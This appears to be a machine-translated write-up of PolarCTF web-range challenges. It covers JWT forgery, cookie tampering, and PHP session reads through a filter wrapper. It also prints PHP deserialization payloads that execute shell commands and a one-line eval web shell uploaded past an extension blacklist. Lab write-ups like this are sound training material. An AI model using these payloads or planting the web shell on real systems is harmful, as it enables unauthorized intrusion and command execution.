Location>code7788 >text

Web Brush Up on the Polarctf Range (2)

Popularity:733 ℃/2024-09-22 22:02:13

1. Honey Snow Ice City Ji police store

Clicked on the range, found that the question said that the hidden milk tea (that is, the ninth cup) will give a flag, but obviously only eight cups, guess the probability of the test is the front-end code change

image

Change id=1 to id=9, then go back to the page and click on Original Milk Tea to bring up the flag.

image

#flag{7d43cc8863ad0ee649048e562fde53ec}

2. Summon the Dragon

Opened the range and found it was a game, played a few games and found it difficult to pass the game.

image

F12 to see the source code of the interface, found a string of text in the file, guess it is jsfuck (from brainfuck)

image

Go to the tool, decrypt the flag
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}

image

flag

Opened the range and pressed F12, found that the flag is given, we use the tool dirsearch scanning, and found that there are files

image
image

Accessing it gives you the third flag3:c0ad71dadd11}

image

Then BurpSuite grabbed and sent packets to try to get something back, found that you can get the second flag2:3ca8737a70f029d

image

We notice that there is a Set-Cookie in the return packet, we try to change the id to 1 to send the packet, we get flag1:flag{7ac5b

image

Splice three flags to get the final result:flag{7ac5b3ca8737a70f029dc0ad71dadd11}

Opened the range, found a login and registration, guessing that the expedition vertically overstepped the authority, through the normal user to the admin user to lift authority

image

Log in with your registered username and press F12, since the title is jwt, we find the value of jwt, and then use the tool to blast it to get the key: SYSA

An explanation of JWT: JWT (json web token)
JWT (json web token), the token consists of three parts in a compact form, which are separated by dots (.) ).

image

Then decode the jwt values via the online site :/, (if it's an offline tournament, you can split it by . for offline tournaments, and decode each segment with base64).
Next, change the username to admin, add the key, and get the new jwt value: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_. 0nnIZfJ1mO50

image

Change the jwt value of the page to the new jwt value, and then revisit the page.

image

This way we'll be able to overstep our authority, and we'll be able to get the flag by clicking on the personal center.

image

#flag{ec39c705cfb5295f9dddcedc819a1659}

5. Sign in

I opened the range, and I couldn't get the submit button to work.

image

Sure enough, open BurpSuite to capture packets, first by sending packets to see the return packet, found that you need to use POST request, and the value of the parameter for the key, the first attempt key=flag

image
image

Then follow the prompts and modify the parameter values to get the flag.

image

#flag{fa3f77dd58a0a8f990bb6292da75618f}

The file contains

Open the range, use BurpSuite to capture packets, found that the return packet has Set-Cookie parameters, and then according to the title of the description, guess there is a pseudo-protocol

image

Take the base64 ciphertext, put it on the cooker and decrypt it.

image

Here we guess the session file is in the /tmp directory, the file format is sess_+sessionid, this side of the sessionid in the return package there are

image

Read the flag via cat or tac.

image

#flag{43306e8113f53ece238c0a124432ce19}

't touch me

Open the range, press F12, find the tip.

image

Then go straight to the F12 method, and follow its instructions step by step.

image

Just visit

image

#flag{0cee5a97f12b172ceeea2e9f67b7413e}

very nice

This question looks at basic deserialization

image

<?php
class Example
 {
     public $sys="system('ls');";
 }
$a = new Example();
echo serialize($a);
?>

#Show all files back first, O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}

image

find that there is, Because it will directly execute the, We useinclude+Pseudo-protocol to read
<?php
class Example
 {
     public $sys="include('php://filter/read=convert.base64-encode/resource=');";
 }
$a = new Example();
echo serialize($a);
?>

#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=');";}

image

base64 decryption is sufficient
#flag{202cb962ac59075b964b07152d234b70}

Refer to a handful of pokies online

<?php
class Example
 {
     public $sys="system('tac f*');";
 }
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}

image

#flag{202cb962ac59075b964b07152d234b70}

deceptive

Catch the packet, change the value of the cookie to admin and you're good to go!

image

#flag{10e35c76602b330149ef009e0b484d8f}

Opened the range, found a * Horse to upload, found a code that should hide a blacklist.

image

A code audit revealed that it is possible to try to bypass this by double-writing the file extension

image

One sentence * Horse
<?php @eval($_POST['aaa']);? >

image

Then just connect through the Chinese Ant Sword

image

#flag{a89f40341f4271659154829a2215f428}